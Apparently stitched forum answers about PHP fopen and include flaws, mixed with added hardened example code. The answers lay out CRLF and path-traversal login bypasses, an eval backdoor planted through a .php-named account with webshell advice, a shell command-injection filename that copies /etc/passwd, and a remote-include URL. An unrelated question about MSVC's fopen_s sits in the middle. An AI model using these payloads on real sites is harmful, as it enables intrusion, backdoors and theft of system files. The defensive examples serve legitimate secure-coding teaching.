I think they're referring to the CRLF vulnerability.
In your sample exploit code, you're passing some php code, but that's not what you would do.
The goal is to make fopen open a file from the internet. If the $email variable contains two strings separated by a CRLF, you can have fopen() visit an external website there where it's not supposed to.
All depending on what happens with the $fh file descriptor after, it will determine how you will take advantage of that.
Here's a link I found on that vulnerability: http://www.securiteam.com/unixfocus/5OP0C0A8AC.html
EDIT after you posted more code:
We're starting with that you can force $password to the value you want.
So the name of the game is forcing $pass to the value you want, such that strcmp returns true, and you get logged in without knowing any password.
$pass is controlled in that last statement $pass = fgets($fh)
And if you use the CRLF vulnerability to point fopen to open a URL that you host, e.g. http://your.ip.address/your-file, and inside that file, you set the same data as you set in $password. And that should allow you to login without registration.
But there are some weird things in the code, e.g. :
$last = fgets($fh);
$first = fgets($fh);
$pass = fgets($fh);
Seems like the code might not be complete, because here the values of $last, $first and $pass will always all be the same which makes no sense. That would be one vector to consider.
Possibility #2 - File traversal:
Using ../ inside your $email variable, you will be able to access a different file in fopen that is outside the acounts/ folder.
If you run:
<?php
$fh = fopen("acounts/../../test.sh","r");
?>
It evaluates successfully and looks two folders up for the contents of test.sh. So you can probe the contents of the file system via the $email variable. Then the name of the game is finding a standard file whose contents you know, feed it in $password, and you can log in to the system without registration.
Possibility #3 - Register an email address ending with .php:
As mentioned by drew010, assuming you are allowed to register a custom account, then by registering an $email ending in .php, and putting eval() php code inside $password when registering your account, that will create a backdoor file inside acounts/ named after your $email that you can access via the web.
Since the file it opens to store user data is referenced as $accountfile = "./acounts/" . $email it looks like one possible attack vector would be to try to register an account using an email address like [email protected] (or just username.php depending on whether there's proper validation).
Since it writes (presumably unhashed?) your password to that file, you can set your password to something evil (e.g. <?php eval($_REQUEST['x']); ?>).
Then, see if you can access http://thesite/accounts/[email protected]?x=echo 'hi'; and see if 'hi' is printed out to the browser.
If that's the case, then have fun with $_REQUEST['x'] and get it to do things like write arbitrary files to the system (a webshell) or open and read other files and print their contents.
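The two answers above both come down to the same root cause: a user-controlled string is glued onto "./acounts/" and handed to fopen(), and the password is compared in the clear. Here is an added example (not code from the question or from either answer) of how that lookup is written defensively. The function names, the .dat suffix and the ACCOUNT_DIR location are assumptions made for illustration.

```php
<?php
// Added example, not code from the question or from any answer above: a hardened
// replacement for the "./acounts/" . $email lookup. Function names, the .dat
// suffix and the ACCOUNT_DIR location are assumptions made for illustration.

// Assumed layout: the account directory lives outside the document root, so a
// stored file can never be fetched, let alone executed, through the web server.
const ACCOUNT_DIR = __DIR__ . '/../acounts';

// Turn the user-supplied identifier into a file path, or return null if it is unsafe.
function accountPath(string $email): ?string
{
    // Allowlist the identifier. \A and \z anchor the match to the whole string, so a
    // trailing "\n" or "\r\n" (the CRLF trick) fails; "/", "\", ":" and ".." cannot
    // appear at all, so neither traversal nor a URL scheme can ever reach fopen().
    if (!preg_match('/\A[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\z/', $email)) {
        return null;
    }
    // Never let the stored name end in an extension the web server might execute.
    if (preg_match('/\.(php|phtml|phar)\z/i', $email)) {
        return null;
    }
    // Defence in depth: resolve the directory and confirm the final path is inside it.
    $base = realpath(ACCOUNT_DIR);
    if ($base === false) {
        return null;
    }
    $path = $base . DIRECTORY_SEPARATOR . $email . '.dat';
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0 || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Registration: store only a password hash, never the password itself.
function registerAccount(string $email, string $password): bool
{
    $path = accountPath($email);
    if ($path === null || file_exists($path)) {
        return false;
    }
    $record = ['email' => $email, 'hash' => password_hash($password, PASSWORD_DEFAULT)];
    return file_put_contents($path, json_encode($record), LOCK_EX) !== false;
}

// Login: compare with password_verify() instead of strcmp() on a plaintext line.
function checkLogin(string $email, string $password): bool
{
    $path = accountPath($email);
    if ($path === null || !is_file($path)) {
        return false;
    }
    $record = json_decode((string) file_get_contents($path), true);
    return is_array($record)
        && isset($record['hash'])
        && password_verify($password, $record['hash']);
}

// Constructed inputs covering the three vectors discussed above.
var_dump(accountPath("user@example.com\r\nhttp://attacker.example/x")); // CRLF
var_dump(accountPath('../../etc/passwd'));                               // traversal
var_dump(accountPath('user@evil.php'));                                  // .php name
var_dump(accountPath('user@example.com'));                               // legitimate
```

The three hostile identifiers all come back as null; only the plain address maps to a file, and only under the account directory once that directory exists. Because the identifier never ends up in a shell and the file is read with plain file_get_contents(), allow_url_fopen no longer matters for this code path either.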
Hello,
- Why is fopen considered unsafe by MSVC?
- Why should fopen_s be more secure?
- Is it really necessary to use fopen_s or can I continue to use fopen, perhaps with an extra check?
- fopen_s is not cross-platform, correct?
A sample attack scenario using allow_url_fopen that allows me to download your password file:
- Suppose your app allows me to provide a URL to a remote image, which you will download and use as my avatar image.
- I provide the following URL:
"http://my.malicious.example.com/sbwoodside.jpg;cp%20/etc/passwd%20downloads/foo.jpg;"
- Your app uses allow_url_fopen to download the file and stores it as "sbwoodside.jpg;cp%20/etc/passwd%20downloads/passwords.txt;". I have now successfully injected a command into the filename.
- Your app wants to compress and resize my image, so you use ImageMagick on the command line with something like exec("magick convert -size 128x128 ".$filename." ".$filename.".128.jpg")
- What does exec actually execute? If you haven't sanitized the filename, then it executes the following on the shell:
magick convert -size 128x128 sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt; sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt;.128.jpg
Since ; is a command delimiter on the shell, that will be broken by the shell automatically into the following separate commands:
magick convert -size 128x128 sbwoodside.jpg
cp /etc/passwd downloads/passwords.txt
sbwoodside.jpg
cp /etc/passwd downloads/passwords.txt
.128.jpg
And now I just go to http://yourapp.com/downloads/passwords.txt and download your password file. Of course, I can do anything I want, since I'm executing commands as your web server on your system.
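The scenario above is really a command injection bug rather than an allow_url_fopen bug: the remote filename is trusted twice, once as a storage name and once as a shell word. As an added example (not the answer's own code), the avatar step below never lets the remote name reach the shell. Function names and the downloads/ directory are assumptions for illustration.

```php
<?php
// Added example, not code from the answer above: the avatar step rewritten so a
// downloaded filename can never be parsed by the shell as commands. Function names
// and the 'downloads/' directory are assumptions for illustration.

// Never keep the remote name. Derive a fixed-shape name from the file's own bytes.
function safeAvatarName(string $remoteUrl, string $contents): string
{
    // Accept only a known image extension taken from the URL path (case-insensitive);
    // anything else, including "jpg;", falls back to a safe default.
    $path = (string) parse_url($remoteUrl, PHP_URL_PATH);
    $ext  = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        $ext = 'jpg';
    }
    // The name is a hash of the content, so the attacker controls no part of it.
    return hash('sha256', $contents) . '.' . $ext;
}

// If exec() must be used, every argument goes through escapeshellarg(): it wraps the
// value in single quotes and escapes embedded quotes, so ";", "|", "&&" and newlines
// are delivered to the program as data instead of being parsed by /bin/sh.
function buildResizeCommand(string $dir, string $name): string
{
    $in  = escapeshellarg($dir . '/' . $name);
    $out = escapeshellarg($dir . '/' . $name . '.128.jpg');
    return "magick convert -size 128x128 $in $out";
}

// Better still (PHP 7.4+): pass the command as an array, which is executed directly
// with no shell at all, so there is nothing to inject into.
function resizeWithoutShell(string $in, string $out): int
{
    $proc = proc_open(['magick', 'convert', '-size', '128x128', $in, $out], [], $pipes);
    return $proc === false ? -1 : proc_close($proc);
}

// Constructed inputs: the hostile URL from the answer and a fake file body.
$hostileUrl  = 'http://my.malicious.example.com/sbwoodside.jpg;cp%20/etc/passwd%20downloads/foo.jpg;';
$hostileName = 'sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt;';
$fakeImage   = "\xFF\xD8\xFF\xE0 constructed bytes standing in for a JPEG";

echo safeAvatarName($hostileUrl, $fakeImage), "\n";
echo buildResizeCommand('downloads', $hostileName), "\n";
```

The first line printed is a 64-hex-character name plus ".jpg", with nothing of the attacker's string left in it. The second shows the hostile name surrounded by single quotes, so even if the old filename were somehow retained, the shell would hand the whole "sbwoodside.jpg;cp /etc/passwd ..." string to magick as one argument and magick would simply fail to find that file.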
It depends on you: how you designed your applications, and whether you considered security during the whole software development life-cycle.
Consider insecure code below that loads web pages according to request parameter (page):
<?php
include($_GET['page']);
?>
And now consider an attacker includes malicious PHP code by using:
?page=http://example.com/badcode-php.txt
He can then bypass all security measures on your site and do anything (accessing local files, uploading other files, etc.).
So it's recommended to turn off allow_url_fopen and allow_url_include to minimize remote file execution attacks.
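Turning the two directives off closes the remote variant, but include($_GET['page']) still reads any local file. As an added example (not the answer's own code), the usual fix is to use the parameter only as a key into an allowlist, never as part of a path; the page names and the pages/ directory are assumptions for illustration.

```php
<?php
// Added example, not code from the answer above: include($_GET['page']) replaced by
// an allowlist lookup. The page names and the pages/ directory are assumptions.

const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Map the request parameter to a file path, or null when it is not a known page.
function resolvePage(?string $page): ?string
{
    // The parameter is only ever a lookup key, never a path fragment, so values such as
    // "http://example.com/badcode-php.txt", "../../etc/passwd" or "php://input" simply
    // miss the table; nothing they contain is interpreted.
    if ($page === null || !array_key_exists($page, PAGES)) {
        return null;
    }
    return __DIR__ . '/' . PAGES[$page];
}

// Verify the php.ini hardening the answer recommends. Both directives are
// PHP_INI_SYSTEM, so they must be set in php.ini (allow_url_fopen = Off,
// allow_url_include = Off); ini_set() cannot change them at run time.
function remoteIncludeDisabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

function remoteFopenDisabled(): bool
{
    return !filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

// Dispatch: unknown keys get a 404 instead of reaching include.
$target = resolvePage($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

With this shape, the payload from the answer (?page=http://example.com/badcode-php.txt) is rejected before include is ever called, and the two ini checks give a deployment test that can fail a build if the remote-wrapper settings are still on.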